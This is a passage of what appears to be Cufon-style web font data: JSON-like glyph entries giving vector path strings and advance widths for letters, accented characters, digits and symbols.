0v-30,0,-46,29,-46,52xm16,-184v0,-37,26,-71,68,-71v32,0,51,17,51,47v0,36,-25,71,-67,71v-31,0,-52,-15,-52,-47","w":123},{"d":"203,-87r35,0v-13,58,-51,93,-114,93v-70,0,-110,-42,-110,-113v0,-83,53,-156,141,-156v55,0,98,30,98,89r-34,0v0,-40,-27,-60,-64,-60v-72,0,-107,65,-107,127v0,50,25,84,76,84v42,0,68,-24,79,-64","w":259},{"d":"189,-257r-41,194v-9,44,-29,69,-80,69v-56,0,-82,-33,-68,-90r35,0v-10,30,-1,61,34,61v35,0,43,-30,49,-58r37,-176r34,0","w":186},{"d":"79,-106r88,0r-19,-121xm-20,0r155,-257r37,0r47,257r-35,0r-12,-77r-109,0r-45,77r-38,0xm139,-289v0,9,7,16,17,16v10,0,18,-7,18,-16v0,-10,-8,-18,-18,-18v-10,0,-17,8,-17,18xm128,-289v0,-16,13,-29,28,-29v15,0,29,13,29,29v0,15,-14,28,-29,28v-15,0,-28,-13,-28,-28","w":240},{"d":"262,-257r-32,154v-8,69,-48,110,-113,109v-75,0,-108,-40,-93,-112r32,-151r34,0r-34,160v-12,50,11,74,61,74v56,0,68,-32,78,-80r33,-154r34,0xm103,-271r47,-39r38,0r31,39r-33,0r-20,-25r-30,25r-33,0","w":259},{"d":"262,-257r-32,154v-8,69,-48,110,-113,109v-75,0,-108,-40,-93,-112r32,-151r34,0r-34,160v-12,50,11,74,61,74v56,0,68,-32,78,-80r33,-154r34,0xm107,-271r30,-39r42,0r-45,39r-27,0xm171,-271r30,-39r43,0r-46,39r-27,0","w":259},{"d":"150,3v-21,1,-51,19,-53,38v0,7,2,14,23,14v5,0,9,0,16,-1r-3,17v-24,2,-63,4,-63,-25v0,-14,14,-28,32,-41v-64,-5,-92,-44,-78,-111r32,-151r34,0r-34,160v-12,50,11,74,61,74v56,0,68,-32,78,-80r33,-154r34,0r-32,154v-9,58,-32,94,-80,106","w":259},{"d":"226,0r8,-35r-72,0r4,-20r97,-99r21,0r-23,100r22,0r-5,19r-22,0r-8,35r-22,0xm237,-54v4,-21,13,-46,14,-66r-64,66r50,0xm58,-172r3,-18v21,1,44,-2,44,-26v0,-15,-11,-19,-26,-19v-19,0,-31,11,-32,28r-25,0v1,-28,24,-48,58,-48v53,0,68,65,18,74v46,22,22,84,-38,83v-38,0,-55,-19,-54,-51r25,0v-1,17,2,31,29,31v21,0,37,-11,37,-31v0,-23,-20,-24,-39,-23xm72,10r156,-271r23,0r-156,271r-23,0","w":300},{"d":"8,0r35,-159r-32,0r6,-27r31,0v10,-38,11,-74,60,-74v9,0,18,1,26,3r-5,26v-37,-10,-47,17,-51,45r36,0r-5,27r-36,0r-34,159r-31,0","w":106},{"d":"175,-91v0,53,-42,95,-96,95v-46,0,-76,-26,-76,-72r32,0v0,30,15,45,46,45v40,0,62,-30,62,-67v0,-57,-74,-66,-96,-26r-28,0r40,-135r129,0r-5,27r-105,0v-5,23,-17,48,-19,70v49,-36,116,0,116,63"},{"d":"20,-263r106,269r-26,0r-106,-269r26,0","w":119},{"d":"52,-257r31,0v-4,20,-13,44,-14,63r24,-18r-4,28r-26,20r-34,164r-31,0r29,-137r-25,20r4,-28r26,-21","w":79},{"d":"107,6v-6,1,-11,11,-12,13v21,-4,42,3,42,25v0,35,-50,38,-78,24r6,-16v13,7,42,11,45,-5v-1,-13,-21,-13,-32,-8r-7,-11r19,-23v-53,-5,-89,-32,-85,-89r35,0v-2,46,26,61,68,61v32,0,64,-14,64,-49v0,-39,-48,-42,-80,-52v-31,-9,-58,-27,-58,-65v0,-50,48,-74,94,-74v51,0,95,25,93,82r-34,0v1,-41,-24,-53,-59,-53v-25,0,-60,11,-60,42v0,39,46,41,77,51v32,10,62,23,62,69v0,53,-54,78,-100,78","w":233},{"d":"151,-182v-34,0,-57,44,-57,75v0,20,13,35,31,35v31,0,55,-46,55,-76v0,-17,-14,-34,-29,-34xm222,-199r-34,120v0,6,3,11,9,11v22,0,50,-43,50,-82v0,-57,-48,-93,-98,-93v-62,0,-109,52,-109,115v0,107,141,153,200,71r23,0v-23,40,-67,63,-113,63v-76,0,-135,-60,-135,-136v0,-74,61,-133,134,-133v67,0,122,46,122,111v0,63,-50,104,-84,104v-13,0,-21,-9,-24,-23v-27,41,-96,25,-96,-33v0,-50,33,-102,84,-102v17,0,33,7,41,29r8,-22r22,0","w":288},{"d":"187,-186r-39,186r-30,0v1,-9,6,-21,5,-28v-24,41,-123,50,-118,-16v4,-46,20,-97,28,-142r31,0r-28,137v0,18,14,26,32,26v76,-4,72,-99,89,-163r30,0xm68,-223r5,-20r97,0r-4,20r-98,0"},{"d":"-17,71r-25,0v79,-87,110,-203,69,-334r20,0v17,39,29,91,29,133v0,82,-40,142,-93,201","w":93},{"d":"108,-163v-73,0,-106,140,-20,140v45,0,69,-51,69,-88v0,-29,-16,-52,-49,-52xm6,-73v0,-61,39,-117,104,-117v50,0,78,27,78,77v0,61,-38,117,-103,117v-49,0,-79,-32,-79,-77xm63,-206r49,-51r31,0r27,51r-27,0r-18,-33r-34,33r-28,0","w":206},{"d":"79,-106r88,0r-19,-121xm-20,0r155,-257r37,0r47,257r-35,0r-12,-77r-109,0r-45,77r-38,0xm98,-271r47,-39r38,0r30,39r-32,0r-20,-25r-30,25r-33,0","w":240},{"d":"182,-186r-123,218v-16,30,-43,55,-82,39r6,-25v36,20,51,-25,65,-46r-33,-186r33,0r22,148r78,-148r34,0xm86,-206r34,-51r41,0r-49,51r-26,0","w":173},{"d":"79,-106r88,0r-19,-121xm-20,0r155,-257r37,0r47,257r-35,0r-12,-77r-109,0r-45,77r-38,0xm183,-271v-20,0,-58,-34,-67,-2r-19,0v5,-17,14,-39,35,-39v24,0,58,35,70,2r18,0v-6,18,-15,39,-37,39","w":240},{"d":"58,-172r3,-18v21,1,44,-2,44,-26v0,-15,-11,-19,-26,-19v-19,0,-31,11,-32,28r-25,0v1,-28,24,-48,58,-48v53,0,68,65,18,74v46,22,22,84,-38,83v-38,0,-55,-19,-54,-51r25,0v-1,17,2,31,29,31v21,0,37,-11,37,-31v0,-23,-20,-24,-39,-23","w":119},{"d":"70,-186v0,27,19,38,43,38v24,0,41,-17,41,-41v0,-26,-15,-39,-40,-39v-26,0,-44,16,-44,42xm90,-23v32,0,55,-20,55,-52v0,-27,-17,-46,-47,-46v-33,0,-58,18,-58,53v0,31,22,45,50,45xm69,-139v-60,-29,-24,-116,46,-116v37,0,72,23,72,63v0,28,-23,53,-46,58v71,32,27,138,-49,138v-45,0,-84,-23,-84,-72v0,-38,24,-65,61,-71"},{"d":"188,-187v0,89,-124,93,-155,160r133,0r-5,27r-163,0v6,-77,74,-93,124,-131v19,-14,34,-29,34,-54v0,-27,-17,-43,-43,-43v-34,0,-54,28,-56,60r-33,0v5,-53,37,-87,92,-87v41,0,72,26,72,68"},{"d":"118,-23v40,0,68,-33,76,-70r20,-99v4,-21,-34,-42,-60,-42v-69,0,-105,67,-105,129v0,42,23,82,69,82xm398,-257r-6,29r-136,0r-17,81r125,0r-6,29r-125,0r-19,89r138,0r-5,29r-171,0r4,-21v-14,18,-41,27,-64,27v-67,0,-101,-51,-101,-114v0,-76,51,-155,135,-155v28,0,60,10,75,35r5,-29r168,0","w":386},{"d":"3,0r54,-257r177,0r-6,29r-143,0r-17,81r133,0r-6,29r-133,0r-19,89r145,0r-7,29r-178,0xm92,-271r47,-39r38,0r30,39r-32,0r-20,-25r-30,25r-33,0","w":219},{"d":"85,-228r-19,89r77,0v54,0,63,-32,63,-50v-2,-57,-70,-34,-121,-39xm3,0r54,-257v80,4,181,-21,183,65v0,34,-23,65,-57,70v47,15,12,82,26,122r-35,0v-3,-9,-5,-29,0,-55v11,-61,-23,-55,-38,-55r-76,0r-23,110r-34,0xm87,39r6,-25r29,0v-5,27,-9,52,-40,55r2,-11v13,-2,17,-10,19,-19r-16,0","w":246},{"d":"29,0r-31,0r39,-186r31,0","w":79},{"d":"40,-111r108,0v2,-26,-10,-52,-44,-52v-36,0,-55,23,-64,52xm175,-84r-140,0v-17,69,84,81,101,26r31,0v-10,41,-44,62,-85,62v-62,0,-78,-43,-78,-75v0,-71,44,-119,95,-119v64,0,87,46,76,106xm87,-206r34,-51r41,0r-49,51r-26,0","w":193},{"d":"81,-186r-9,40r-40,0r9,-40r40,0xm-10,71v13,-68,31,-129,50,-191r16,0r-15,111r-17,80r-34,0","w":93},{"d":"129,-95v-28,18,-102,0,-102,46v0,40,72,28,86,2v8,-15,12,-31,16,-48xm50,-130r-31,0v6,-41,41,-60,81,-60v36,0,68,9,68,47v0,39,-19,73,-23,111v-2,15,10,13,19,9r-5,23v-20,10,-48,2,-43,-23v-23,37,-120,43,-120,-25v0,-54,53,-57,94,-61v32,-3,47,-5,47,-30v0,-41,-84,-28,-87,9xm55,-206r49,-51r31,0r28,51r-28,0r-18,-33r-33,33r-29,0","w":186},{"d":"3,0r54,-257r37,0r92,213r43,-213r33,0r-54,257r-37,0r-92,-211r-43,211r-33,0xm193,-271v-21,0,-58,-34,-68,-2r-19,0v5,-17,15,-39,36,-39v24,1,58,35,69,2r18,0v-6,18,-14,39,-36,39","w":259},{"d":"187,-186r-39,186r-30,0v1,-9,6,-21,5,-28v-24,41,-123,50,-118,-16v4,-46,20,-97,28,-142r31,0r-28,137v0,18,14,26,32,26v76,-4,72,-99,89,-163r30,0xm95,-206r34,-51r41,0r-49,51r-26,0"},{"d":"3,0r54,-257r34,0r-54,257r-34,0xm94,-271r8,-38r32,0r-8,38r-32,0xm25,-271r8,-38r32,0r-8,38r-32,0","w":93},{"d":"-2,0r55,-257r30,0r-32,152r94,-81r40,0r-81,69r46,117r-34,0r-36,-99r-37,33r-14,66r-31,0xm50,39r6,-25r29,0v-5,27,-9,52,-40,55r2,-11v13,-2,17,-10,19,-19r-16,0","w":173},{"d":"221,-181r-34,0v1,-41,-24,-53,-59,-53v-25,0,-60,11,-60,42v0,39,46,41,77,51v32,10,62,23,62,69v0,53,-54,78,-100,78v-62,0,-106,-27,-102,-90r35,0v-2,46,26,61,68,61v32,0,64,-14,64,-49v0,-39,-48,-42,-80,-52v-31,-9,-58,-27,-58,-65v0,-50,48,-74,94,-74v51,0,95,25,93,82","w":233},{"d":"3,0r54,-257r34,0r-48,228r136,0r-6,29r-170,0"},{"d":"-2,0r39,-186r29,0v-2,13,-9,29,-8,40v16,-29,40,-47,78,-44r-7,32v-86,-5,-82,89,-100,158r-31,0xm-4,39r6,-25r29,0v-5,27,-9,52,-40,55r2,-11v13,-2,17,-10,19,-19r-16,0","w":119},{"d":"129,-95v-28,18,-102,0,-102,46v0,40,72,28,86,2v8,-15,12,-31,16,-48xm50,-130r-31,0v6,-41,41,-60,81,-60v36,0,68,9,68,47v0,39,-19,73,-23,111v-2,15,10,13,19,9r-5,23v-20,10,-48,2,-43,-23v-23,37,-120,43,-120,-25v0,-54,53,-57,94,-61v32,-3,47,-5,47,-30v0,-41,-84,-28,-87,9xm61,-223r4,-20r97,0r-4,20r-97,0","w":186},{"d":"249,-257r-145,257r-39,0r-37,-257r35,0r27,224r122,-224r37,0","w":219},{"d":"91,-241r-11,55r37,0r-6,27r-37,0r-24,122v1,16,23,13,36,9r-6,28v-35,8,-70,-2,-61,-44r24,-115r-31,0r6,-27r31,0r11,-55r31,0xm24,39r6,-25r29,0v-5,28,-10,52,-41,55r3,-11v13,-2,17,-10,19,-19r-16,0","w":113},{"d":"29,0v-16,4,-43,29,-43,41v0,7,1,14,22,14v5,0,10,0,17,-1r-3,17v-24,2,-63,4,-63,-25v0,-16,18,-32,39,-46r39,-186r31,0xm83,-257r-8,37r-31,0r8,-37r31,0","w":79},{"d":"79,-106r88,0r-19,-121xm-20,0r155,-257r37,0r47,257r-35,0r-12,-77r-109,0r-45,77r-38,0xm174,-271r7,-38r32,0r-7,38r-32,0xm104,-271r8,-38r32,0r-8,38r-32,0","w":240},{"d":"239,6r-20,21r-35,-35v-78,38,-170,-4,-170,-99v0,-83,53,-156,141,-156v128,0,134,180,52,239xm137,-53r20,-20r28,28v57,-44,66,-188,-30,-189v-72,0,-107,65,-107,127v0,64,53,100,113,77","w":273},{"d":"199,-140r0,25r-182,0r0,-25r182,0xm17,-42r0,-25r182,0r0,25r-182,0","w":216},{"d":"3,0r54,-257r177,0r-6,29r-143,0r-17,81r133,0r-6,29r-133,0r-19,89r145,0r-7,29r-178,0","w":219},{"d":"40,-111r108,0v2,-26,-10,-52,-44,-52v-36,0,-55,23,-64,52xm175,-84r-140,0v-17,69,84,81,101,26r31,0v-10,41,-44,62,-85,62v-62,0,-78,-43,-78,-75v0,-71,44,-119,95,-119v64,0,87,46,76,106xm114,-257r20,51r-24,0r-35,-51r39,0","w":193},{"d":"38,-76v0,27,15,50,46,50v46,0,68,-52,68,-89v0,-29,-16,-48,-48,-48v-43,0,-66,53,-66,87xm199,-186r-34,159v-9,60,-38,103,-99,103v-38,0,-73,-17,-74,-58r31,0v2,25,23,31,46,31v47,1,60,-40,66,-76v-37,55,-127,24,-127,-49v0,-55,36,-114,96,-114v28,-1,54,16,60,38r6,-34r29,0","w":206},{"d":"207,-251r-4,26v-59,55,-109,149,-133,225r-35,0v26,-83,74,-160,135,-224r-133,0r6,-27r164,0"},{"d":"3,0r54,-257r47,0r35,221r127,-221r48,0r-55,257r-33,0r52,-225r-131,225r-33,0r-34,-225r-45,225r-32,0","w":313},{"d":"79,-106r88,0r-19,-121xm-20,0r155,-257r37,0r47,257r-35,0r-12,-77r-109,0r-45,77r-38,0","w":240},{"d":"262,-257r-32,154v-8,69,-48,110,-113,109v-75,0,-108,-40,-93,-112r32,-151r34,0r-34,160v-12,50,11,74,61,74v56,0,68,-32,78,-80r33,-154r34,0xm168,-310r16,39r-26,0r-31,-39r41,0","w":259},{"d":"17,3r0,-25r153,-69r-153,-70r0,-24r182,83r0,22","w":216},{"d":"178,-186r-103,186r-33,0r-27,-186r33,0r16,155r81,-155r33,0","w":173},{"d":"-2,0r39,-186r29,0v-2,13,-9,29,-8,40v16,-29,40,-47,78,-44r-7,32v-86,-5,-82,89,-100,158r-31,0","w":119},{"d":"-16,0r112,-134r-62,-123r37,0r47,101r83,-101r38,0r-106,127r65,130r-35,0r-52,-109r-88,109r-39,0","w":219},{"d":"262,-257r-32,154v-8,69,-48,110,-113,109v-75,0,-108,-40,-93,-112r32,-151r34,0r-34,160v-12,50,11,74,61,74v56,0,68,-32,78,-80r33,-154r34,0xm140,-271r30,-39r43,0r-45,39r-28,0","w":259},{"d":"235,-257r-6,29r-87,0r-48,228r-34,0r48,-228r-86,0r6,-29r207,0","w":206},{"d":"40,-111r108,0v2,-26,-10,-52,-44,-52v-36,0,-55,23,-64,52xm175,-84r-140,0v-17,69,84,81,101,26r31,0v-10,41,-44,62,-85,62v-62,0,-78,-43,-78,-75v0,-71,44,-119,95,-119v64,0,87,46,76,106xm92,-213r8,-38r32,0r-8,38r-32,0","w":193},{"d":"203,-87r35,0v-13,58,-51,93,-114,93v-70,0,-110,-42,-110,-113v0,-83,53,-156,141,-156v55,0,98,30,98,89r-34,0v0,-40,-27,-60,-64,-60v-72,0,-107,65,-107,127v0,50,25,84,76,84v42,0,68,-24,79,-64xm223,-310r-47,39r-38,0r-30,-39r31,0r20,24r30,-24r34,0","w":259},{"d":"129,-95v-28,18,-102,0,-102,46v0,40,72,28,86,2v8,-15,12,-31,16,-48xm50,-130r-31,0v6,-41,41,-60,81,-60v36,0,68,9,68,47v0,39,-19,73,-23,111v-2,15,10,13,19,9r-5,23v-20,10,-48,2,-43,-23v-23,37,-120,43,-120,-25v0,-54,53,-57,94,-61v32,-3,47,-5,47,-30v0,-41,-84,-28,-87,9","w":186},{"d":"14,-107v0,-83,53,-156,141,-156v67,0,107,50,107,114v0,81,-52,155,-138,155v-70,0,-110,-42,-110,-113xm48,-107v0,50,25,84,76,84v68,0,104,-65,104,-126v0,-48,-25,-85,-73,-85v-72,0,-107,65,-107,127","w":273},{"d":"14,-107v0,-83,53,-156,141,-156v67,0,107,50,107,114v0,81,-52,155,-138,155v-70,0,-110,-42,-110,-113xm48,-107v0,50,25,84,76,84v68,0,104,-65,104,-126v0,-48,-25,-85,-73,-85v-72,0,-107,65,-107,127xm141,-271r30,-39r44,0r-46,39r-28,0","w":273},{"d":"62,71r-20,0v-17,-38,-29,-90,-29,-132v0,-82,39,-142,92,-202r26,0v-77,87,-113,204,-69,334","w":93},{"d":"203,-87r35,0v-13,58,-51,93,-114,93v-70,0,-110,-42,-110,-113v0,-83,53,-156,141,-156v55,0,98,30,98,89r-34,0v0,-40,-27,-60,-64,-60v-72,0,-107,65,-107,127v0,50,25,84,76,84v42,0,68,-24,79,-64xm136,-271r30,-39r44,0r-46,39r-28,0","w":259},{"d":"3,0r54,-257r34,0r-48,228r136,0r-6,29r-170,0xm102,-229r6,-28r30,0v-7,29,-9,64,-44,63r3,-13v14,0,19,-16,20,-22r-15,0"},{"d":"37,0v-16,4,-43,29,-43,41v0,7,2,14,23,14v5,0,9,0,16,-1r-3,17v-24,2,-63,4,-63,-25v0,-16,18,-32,39,-46r-3,0r54,-257r34,0","w":93},{"d":"3,0r54,-257r34,0r-48,228r136,0r-6,29r-170,0xm72,39r5,-25r29,0v-5,27,-9,52,-40,55r2,-11v13,-2,17,-10,19,-19r-15,0"},{"d":"78,-160v-15,3,-36,16,-33,34v6,38,49,61,68,89v85,-26,-11,-92,-35,-123xm187,-200r-29,0v0,-22,-11,-36,-35,-36v-38,0,-43,44,-17,61v25,31,71,50,71,98v0,32,-21,54,-52,58v31,42,-9,94,-59,90v-40,-3,-63,-29,-63,-68r28,0v0,25,14,41,40,41v41,0,40,-47,16,-65v-24,-31,-70,-54,-70,-101v0,-32,20,-51,50,-57v-25,-41,12,-84,57,-84v38,0,66,23,63,63"},{"d":"61,0r13,-63r-52,0r5,-21r52,0v1,-9,5,-20,0,-27r-47,0r5,-22r35,0r-40,-124r36,0r36,124r86,-124r39,0r-90,124r35,0r-5,22r-46,0v-6,7,-11,15,-12,27r53,0r-5,21r-53,0r-13,63r-32,0"},{"d":"117,-51v0,-38,-98,-33,-98,-86v0,-35,34,-53,69,-53v35,0,70,15,70,59r-30,0v1,-21,-18,-32,-39,-32v-19,0,-39,4,-39,23v0,38,98,33,98,87v0,41,-40,57,-76,57v-42,0,-75,-15,-75,-63r30,0v-1,28,22,36,48,36v20,0,42,-7,42,-28xm77,-206r34,-51r41,0r-49,51r-26,0","w":173},{"d":"9,-200r18,-17r20,20v27,-25,79,-25,106,-1r20,-20r18,19r-20,19v25,27,25,80,0,108r20,20r-17,17r-20,-21v-28,27,-81,26,-108,0r-20,21r-17,-17r20,-21v-25,-27,-26,-80,1,-106xm101,-189v-34,0,-60,28,-60,63v0,35,27,63,60,63v33,0,58,-28,58,-63v0,-34,-25,-63,-58,-63"},{"d":"54,-162r34,0v11,-50,27,-113,96,-92r-7,26v-42,-16,-48,32,-57,66r39,0r-6,25r-40,0r-42,149v-9,38,-35,52,-78,46r8,-27v24,5,36,-11,41,-29r40,-139r-34,0"},{"d":"199,-185r0,24r-153,70r153,69r0,25r-182,-83r0,-22","w":216},{"d":"146,-204r-8,40r-40,0v9,-40,9,-89,59,-93r-3,17v-19,3,-24,20,-28,36r20,0xm81,-204r-9,40r-40,0v9,-40,10,-89,60,-93r-4,17v-19,3,-24,20,-28,36r21,0","w":153},{"d":"42,-217r8,-40r40,0v-9,40,-9,89,-59,93r3,-17v19,-3,24,-20,28,-36r-20,0xm107,-217r9,-40r40,0v-9,40,-10,89,-60,93r4,-17v19,-3,23,-20,27,-36r-20,0","w":153},{"d":"-6,6r106,-269r26,0r-106,269r-26,0","w":119},{"w":100},{"d":"120,-182r0,79r79,0r0,24r-79,0r0,79r-24,0r0,-79r-79,0r0,-24r79,0r0,-79r24,0","w":216},{"d":"-2,0r39,-186r31,0r-39,186r-31,0xm83,-257r-8,37r-31,0r8,-37r31,0","w":79},{"d":"163,-110v0,-30,-14,-53,-42,-53v-54,0,-76,54,-76,94v0,29,21,46,51,46v44,0,67,-51,67,-87xm-2,0r55,-257r30,0r-19,95v39,-54,130,-25,130,52v0,58,-35,114,-98,114v-35,1,-58,-23,-64,-39r-6,35r-28,0","w":213},{"d":"51,-164r0,-93r25,0r0,93r-25,0","w":100},{"d":"93,-150r18,-86v-22,0,-55,11,-55,46v-1,22,21,31,37,40xm105,-116r-19,95v19,4,67,-9,67,-50v0,-34,-23,-37,-48,-45xm55,35r7,-31v-45,-8,-68,-39,-66,-88r33,0v-2,34,11,55,39,61r19,-97v-35,-11,-64,-25,-64,-67v0,-49,45,-81,93,-76r5,-23r19,0r-5,25v34,9,61,35,58,80r-32,0v1,-31,-11,-46,-32,-53r-17,88v38,11,74,30,74,72v0,58,-57,87,-105,80r-6,29r-20,0"},{"d":"221,-181r-34,0v1,-41,-24,-53,-59,-53v-25,0,-60,11,-60,42v0,39,46,41,77,51v32,10,62,23,62,69v0,53,-54,78,-100,78v-62,0,-106,-27,-102,-90r35,0v-2,46,26,61,68,61v32,0,64,-14,64,-49v0,-39,-48,-42,-80,-52v-31,-9,-58,-27,-58,-65v0,-50,48,-74,94,-74v51,0,95,25,93,82xm116,-271r29,-39r44,0r-46,39r-27,0","w":233},{"d":"262,-257r-32,154v-8,69,-48,110,-113,109v-75,0,-108,-40,-93,-112r32,-151r34,0r-34,160v-12,50,11,74,61,74v56,0,68,-32,78,-80r33,-154r34,0xm114,-278r4,-20r97,0r-4,20r-97,0","w":259},{"d":"162,-111r104,0v4,-27,-8,-52,-42,-52v-33,0,-55,25,-62,52xm286,-58v-13,38,-46,62,-89,62v-29,0,-55,-8,-66,-40v-16,27,-41,40,-73,40v-31,0,-60,-12,-60,-52v0,-41,35,-52,71,-56v35,-4,71,-4,71,-35v0,-41,-84,-28,-87,9r-30,0v7,-44,42,-60,83,-60v24,0,49,6,60,29v35,-52,131,-32,131,44v0,11,-2,22,-5,33r-135,0v-7,33,3,60,42,61v27,0,46,-12,56,-35r31,0xm130,-96v-32,18,-101,1,-101,48v0,36,60,30,79,9v13,-13,19,-39,22,-57","w":313},{"d":"262,-257r-32,154v-8,69,-48,110,-113,109v-75,0,-108,-40,-93,-112r32,-151r34,0r-34,160v-12,50,11,74,61,74v56,0,68,-32,78,-80r33,-154r34,0xm180,-271r8,-38r32,0r-8,38r-32,0xm111,-271r7,-38r32,0r-7,38r-32,0","w":259},{"d":"-33,71r5,-21v54,8,44,-58,55,-97v10,-35,32,-45,42,-49v-10,3,-32,-26,-21,-49v4,-26,12,-49,14,-77v2,-20,-11,-22,-30,-20r5,-21v36,-5,62,8,54,47v-6,27,-15,51,-15,80v0,17,11,28,23,28r-6,24v-37,2,-42,71,-52,108v-11,41,-33,51,-74,47","w":119},{"d":"-2,0r39,-186r29,0v-2,13,-9,29,-8,40v16,-29,40,-47,78,-44r-7,32v-86,-5,-82,89,-100,158r-31,0xm71,-206r34,-51r40,0r-49,51r-25,0","w":119},{"d":"62,-176r-31,0v3,-48,38,-84,87,-84v36,0,75,18,75,59v-1,78,-85,72,-93,135r-29,0v6,-38,25,-59,55,-79v17,-12,34,-27,34,-50v0,-26,-17,-38,-41,-38v-34,0,-54,25,-57,57xm52,0r9,-40r40,0r-9,40r-40,0"},{"d":"40,-111r108,0v2,-26,-10,-52,-44,-52v-36,0,-55,23,-64,52xm175,-84r-140,0v-17,69,84,81,101,26r31,0v-10,41,-44,62,-85,62v-62,0,-78,-43,-78,-75v0,-71,44,-119,95,-119v64,0,87,46,76,106xm59,-223r5,-20r97,0r-4,20r-98,0","w":193},{"d":"5,0r9,-40r40,0v-9,40,-10,89,-60,93r4,-17v19,-3,24,-20,28,-36r-21,0","w":100},{"d":"-2,0r55,-257r30,0r-21,99v24,-41,122,-50,118,15v-3,48,-20,98,-28,143r-31,0r28,-138v-4,-39,-60,-25,-78,-4v-29,33,-28,94,-42,142r-31,0"},{"d":"77,-121r5,-24v32,1,71,-4,71,-48v0,-30,-22,-35,-43,-35v-28,0,-48,17,-52,52r-32,0v6,-42,32,-79,86,-79v45,0,73,20,73,63v0,30,-22,52,-45,59v25,11,33,31,33,53v0,35,-29,84,-92,84v-50,0,-82,-26,-81,-83r33,0v-1,28,8,56,48,56v34,0,59,-21,59,-56v0,-39,-32,-42,-63,-42"},{"d":"141,-204r-107,117r82,0xm98,0r13,-60r-112,0r6,-30r151,-165r26,0r-35,168r33,0r-5,27r-34,0r-13,60r-30,0"},{"d":"181,0v-25,-1,-47,27,-51,41v0,7,2,14,23,14v5,0,10,0,17,-1r-4,17v-24,2,-63,4,-63,-25v0,-16,19,-32,40,-46r-140,0r54,-257r177,0r-6,29r-143,0r-17,81r133,0r-6,29r-133,0r-19,89r145,0","w":219},{"d":"9,-95v0,-58,32,-160,112,-160v45,0,68,28,68,96v0,47,-25,163,-109,163v-54,0,-71,-44,-71,-99xm41,-90v0,41,12,67,42,67v57,0,74,-104,74,-127v0,-28,5,-78,-39,-78v-55,0,-77,102,-77,138"},{"d":"-15,68r7,-16v13,6,41,11,44,-5v-1,-13,-20,-13,-31,-8r-7,-11r26,-33r17,0r-20,24v21,-4,42,3,42,25v0,36,-50,38,-78,24","w":79},{"d":"12,-170v0,-49,85,-20,92,-55v-5,-20,-54,-15,-55,7r-22,0v3,-25,27,-37,53,-37v26,0,58,15,42,45r-12,51v1,6,7,4,12,3r-3,17v-14,6,-29,-1,-29,-14v-18,24,-78,24,-78,-17xm99,-196v-17,11,-65,0,-66,28v7,25,65,11,61,-12","w":111},{"d":"5,0r9,-40r40,0v-9,40,-10,89,-60,93r4,-17v19,-3,24,-20,28,-36r-21,0xm84,-186r-8,40r-40,0r8,-40r40,0","w":100},{"d":"9,-129v0,-76,61,-134,135,-134v73,0,135,58,135,134v0,77,-62,135,-135,135v-74,0,-135,-58,-135,-135xm33,-129v0,66,48,115,111,115v62,0,111,-49,111,-115v0,-64,-49,-114,-111,-114v-63,0,-111,50,-111,114xm193,-103r23,0v-18,95,-154,59,-147,-26v-11,-88,134,-115,146,-27r-22,0v-19,-62,-107,-34,-100,27v-9,62,90,88,100,26","w":288},{"d":"79,-106r88,0r-19,-121xm-20,0r155,-257r37,0r47,257r-35,0r-12,-77r-109,0r-45,77r-38,0xm107,-310r18,0v8,27,63,21,76,0r18,0v-5,43,-118,55,-112,0","w":240},{"d":"164,-114v0,-30,-15,-49,-48,-49v-46,0,-73,53,-73,92v0,28,17,48,47,48v49,0,74,-50,74,-91xm-18,71r69,-328r31,0r-22,98v39,-60,134,-29,134,45v0,57,-38,118,-103,118v-24,1,-50,-9,-59,-32r-19,99r-31,0","w":213},{"d":"3,0r54,-257r177,0r-6,29r-143,0r-17,81r133,0r-6,29r-133,0r-19,89r145,0r-7,29r-178,0xm168,-271r8,-38r32,0r-8,38r-32,0xm99,-271r8,-38r32,0r-8,38r-32,0","w":219},{"d":"129,-95v-28,18,-102,0,-102,46v0,40,72,28,86,2v8,-15,12,-31,16,-48xm50,-130r-31,0v6,-41,41,-60,81,-60v36,0,68,9,68,47v0,39,-19,73,-23,111v-2,15,10,13,19,9r-5,23v-20,10,-48,2,-43,-23v-23,37,-120,43,-120,-25v0,-54,53,-57,94,-61v32,-3,47,-5,47,-30v0,-41,-84,-28,-87,9xm125,-213r7,-37r33,0r-8,37r-32,0xm66,-213r8,-37r32,0r-8,37r-32,0","w":186},{"d":"3,0r54,-257r34,0r-26,127r145,-127r46,0r-124,106r83,151r-38,0r-70,-130r-52,43r-18,87r-34,0","w":240},{"d":"3,0r25,-122r-23,0r5,-25r23,0r24,-110r90,0v64,0,97,37,97,98v0,97,-58,159,-143,159r-98,0xm84,-228r-17,81r72,0r-5,25r-72,0r-20,93r60,0v73,0,108,-64,108,-126v0,-38,-14,-73,-71,-73r-55,0","w":253},{"d":"18,-95r78,-156r24,0r78,156r-25,0r-65,-130r-64,130r-26,0","w":216},{"d":"109,-255r-32,154r-24,0r24,-117v-14,5,-25,6,-42,6r3,-18v26,0,47,-11,55,-25r16,0","w":119},{"d":"3,0r54,-257r34,0r-23,110r134,0r23,-110r35,0r-54,257r-35,0r25,-118r-134,0r-25,118r-34,0","w":259},{"d":"-43,69r5,-27v23,6,28,-1,34,-33r41,-195r31,0r-47,221v-5,30,-31,41,-64,34xm83,-257r-8,37r-31,0r8,-37r31,0","w":79},{"d":"-19,0r4,-23r130,-136r-100,0r5,-27r142,0r-5,22r-131,137r112,0r-6,27r-151,0xm158,-257r-48,51r-31,0r-28,-51r27,0r19,33r33,-33r28,0","w":159},{"d":"129,-95v-28,18,-102,0,-102,46v0,40,72,28,86,2v8,-15,12,-31,16,-48xm50,-130r-31,0v6,-41,41,-60,81,-60v36,0,68,9,68,47v0,39,-19,73,-23,111v-2,15,10,13,19,9r-5,23v-20,10,-48,2,-43,-23v-23,37,-120,43,-120,-25v0,-54,53,-57,94,-61v32,-3,47,-5,47,-30v0,-41,-84,-28,-87,9xm112,-257r20,51r-24,0r-35,-51r39,0","w":186},{"d":"24,-91v0,-13,11,-23,23,-23v13,0,23,10,23,23v0,13,-10,23,-23,23v-13,0,-23,-11,-23,-23","w":100},{"d":"43,-9r-17,-17r65,-65r-65,-65r17,-18r65,65r65,-65r17,18r-64,65r65,65r-17,17r-66,-65","w":216},{"d":"60,-118r-19,89r83,0v17,0,62,-4,62,-51v0,-58,-75,-32,-126,-38xm3,0r53,-257r103,0v91,-9,92,109,23,123v76,31,29,134,-52,134r-127,0xm83,-228r-17,81v57,-1,137,12,131,-48v-5,-51,-68,-28,-114,-33","w":246},{"d":"156,-255r-54,255r-33,0r42,-194v-23,5,-43,7,-66,7r5,-24v31,0,67,-15,82,-44r24,0"},{"d":"115,-120v0,66,-89,69,-8